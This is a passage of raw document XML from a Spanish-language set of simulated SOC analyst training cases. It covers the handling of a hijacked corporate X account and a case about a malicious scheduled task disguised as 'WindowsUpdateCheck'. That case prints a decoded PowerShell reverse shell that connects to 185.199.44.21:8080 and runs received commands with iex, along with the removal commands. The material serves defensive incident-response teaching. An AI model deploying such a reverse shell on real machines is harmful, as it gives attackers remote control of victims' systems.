        <w:t xml:space="preserve"> determinar qué pasó y cómo recuperar el control de la cuenta.</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k7tgh42uvinu" w:id="16"/>
      <w:bookmarkEnd w:id="16"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis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1. Fuente de información</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DA">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Al ser una cuenta en una plataforma externa (SaaS), no hay logs de servidor propios. La investigación se hace desde el panel de seguridad de la propia plataforma (historial de inicio de sesión, sesiones activas, aplicaciones de terceros conectadas).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2. Revisión de sesiones activas</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DC">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sesión activa: iOS App - iniciada 03:14 AM desde Lagos, Nigeria</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DD">
      <w:pPr>
        <w:rPr>
          <w:color w:val="14181f"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="14181f"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Sesión activa: Web (Chrome) - iniciada 09:00 AM desde Mendoza, Argentina (equipo Marketing, normal)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000DE">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">La combinación de ubicación inusual (Nigeria) y horario fuera del patrón habitual del equipo (3 AM, cuando Marketing opera desde Mendoza en horario diurno) es una señal fuerte de acceso no autorizado — a confirmar consultando si alguien del equipo estaba usando VPN por trabajo remoto a esa hora, cosa poco probable dado el horario.</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3. Priorización de la respuesta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E0">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Antes de cambiar contraseña o correo, se revisan y cierran las sesiones activas no reconocidas y se revocan aplicaciones de terceros conectadas — de lo contrario, el atacante podría conservar acceso (por sesión abierta o integración API) aunque se cambien las credenciales.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v76mcu24tyip" w:id="17"/>
      <w:bookmarkEnd w:id="17"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Informe de incidente</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Vector:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Acceso no autorizado a la cuenta corporativa de X (Twitter), evidenciado por una sesión activa desde Nigeria a las 03:14 AM — horario y ubicación fuera del patrón habitual del equipo de Marketing (Mendoza). Causa de acceso aún no confirmada (hipótesis: credenciales robadas, fuerza bruta o phishing).</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Impacto:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Publicación no autorizada promocionando una falsa preventa de criptomonedas, y cambio del correo de recuperación de la cuenta — riesgo reputacional y posible exposición de seguidores a fraude.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Remediación aplicada:</w:t>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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Revisión del panel de sesiones activas y aplicaciones de terceros conectadas a la cuenta.</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Cierre de todas las sesiones activas no reconocidas.</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Cambio de contraseña y restitución del correo de recuperación legítimo.</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Framework de referencia:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> MITRE ATT&amp;CK — T1586 (Compromise Accounts), T1098 (Account Manipulation).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3" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="24" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="300" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vez5pwgd6g7b" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="auto" w:space="3" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="24" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="300" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_vez5pwgd6g7b" w:id="18"/>
      <w:bookmarkEnd w:id="18"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="33"/>
          <w:szCs w:val="33"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CASO 9: Alerta de PowerShell ofuscado ejecutado vía tarea programada</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="auto" w:space="3" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="24" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:before="12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Nota: práctica teórica y de razonamiento — comandos y logs simulados con fines de aprendizaje, no ejecutados en un entorno real.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">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Contexto: Analista SOC junior. Wazuh dispara una alerta en </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8e2626"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">HR-PC-03</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PC de un empleado de RR.HH.) un jueves a las 6 AM, con la oficina vacía.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">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Alerta recibida: Se creó una nueva tarea programada llamada </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8e2626"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WindowsUpdateCheck</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> que ejecuta PowerShell con el flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8e2626"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-WindowStyle Hidden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> cada 30 minutos. El script contiene una cadena larga en Base64.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">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Tarea: determinar qué está pasando y qué acciones tomar.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pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="auto" w:space="3" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="24" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_1a0flitlooxh" w:id="19"/>
      <w:bookmarkEnd w:id="19"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Análisis</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:pBdr>
          <w:top w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:left w:color="auto" w:space="3" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="24" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:before="12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1. Identificación de las señales</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">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El nombre de la tarea (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8e2626"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">WindowsUpdateCheck</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) imita una actualización legítima de Windows — técnica de masquerading. El flag </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8e2626"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-WindowStyle Hidden</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> oculta la ventana de ejecución para que el usuario no la note. La repetición cada 30 minutos no busca "pasar desapercibido" (eso ya lo cubre el flag oculto), sino garantizar persistencia: el atacante se asegura de recuperar acceso aunque el proceso se cierre o el equipo se reinicie.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F7">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2. Contención</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">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Se aísla el equipo de la red. Antes de eliminar la tarea programada, se decodifica el script en Base64 para entender el objetivo del atacante — eliminarla sin revisarla primero implicaría perder evidencia de lo que realmente hizo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">
      <w:pPr>
        <w:spacing w:line="340" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="898781"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="898781"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:spacing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8100c2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System.Text.Encoding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::Unicode.GetString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8100c2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System.Convert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::FromBase64String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"JABzAD0ATgBlAHcALQBP..."</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FB">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Resultado simulado (script decodificado):</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:spacing w:line="340" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="898781"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="898781"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000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 = </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0051c2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New-Object</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="14181f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Net.Sockets.TCPClient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'185.199.44.21'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8080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stream =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s.GetStream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8100c2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">byte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bytes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65535</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8100c2"/>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while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 =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stream.Read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bytes,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bytes.Length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-ne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51c2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">New-Object</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="14181f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -TypeName System.Text.ASCIIEncoding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.GetString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bytes,</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sendback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iex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 2&gt;&amp;1 | </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="0051c2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Out-String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sendback2 =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sendback + </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'PS '</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pwd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.Path + </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">'&gt; '</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sendbyte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8100c2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">text.encoding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::ASCII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.GetBytes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sendback2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stream.Write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sendbyte,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sendbyte.Length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06">
      <w:pPr>
        <w:spacing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07">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Confirma un reverse shell en PowerShell puro ("living off the land", sin depender de ejecutables externos): se conecta a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8e2626"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">185.199.44.21:8080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, recibe comandos del atacante, los ejecuta con </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="8e2626"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">iex</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Invoke-Expression) y devuelve el resultado.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000108">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3. Eliminación de la tarea</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:spacing w:line="340" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="898781"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:cs="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="898781"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">powershell</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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0051c2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Get-ScheduledTask</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="14181f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -TaskName </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"WindowsUpdateCheck"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:spacing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0051c2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Unregister-ScheduledTask</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="14181f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -TaskName </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="008000"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"WindowsUpdateCheck"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="14181f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Confirm:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="b34a00"/>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3" w:sz="0" w:val="none"/>
          <w:bottom w:color="auto" w:space="0" w:sz="0" w:val="none"/>
          <w:right w:color="auto" w:space="24" w:sz="0" w:val="none"/>
          <w:between w:color="auto" w:space="0" w:sz="0" w:val="none"/>
        </w:pBdr>
        <w:spacing w:after="0" w:before="0" w:line="312" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="0b0b0b"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dkegc0qzszyf" w:id="20"/>
